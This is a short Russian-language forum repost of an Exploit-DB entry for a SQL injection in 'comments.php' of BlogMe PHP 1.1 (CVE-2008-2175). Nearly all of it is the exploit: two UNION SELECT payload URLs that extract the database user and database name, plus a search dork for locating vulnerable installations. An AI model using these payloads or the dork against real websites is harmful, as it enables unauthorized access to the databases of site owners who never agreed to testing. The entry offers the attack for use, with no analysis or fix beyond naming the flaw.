Exploit BlogMe PHP 1.1 - 'comments.php' SQL Injection

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
5533
Проверка EDB
  1. Пройдено
Автор
HIS0K4
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
cve-2008-2175
Дата публикации
2008-05-03
Код:
###########################################
{+} BlogMe PHP remote SQL injection exploit
{+} Script download : http://www.drumster.net/gamma/downloads/BlogMe11.zip
{+} Founded by : His0k4 [ ALGERIAN HaCkEr ]
{+} Greetz : All friends & muslims HaCkeRs...
{+} Dork : "BlogMe PHP created by Gamma Scripts"
###########################################
{+} Exploit :
http://localhost/[BlogMe_path]/comments.php?id=-1 UNION SELECT 1,2,3,4,5,6,aes_decrypt(aes_encrypt(user(),0x71),0x71)--
OR :
http://localhost/[BlogMe_path]/comments.php?id=-1 UNION SELECT 1,2,unhex(hex(database())),4,5,6,7--
###########################################

# milw0rm.com [2008-05-03]
 
Источник
www.exploit-db.com

Похожие темы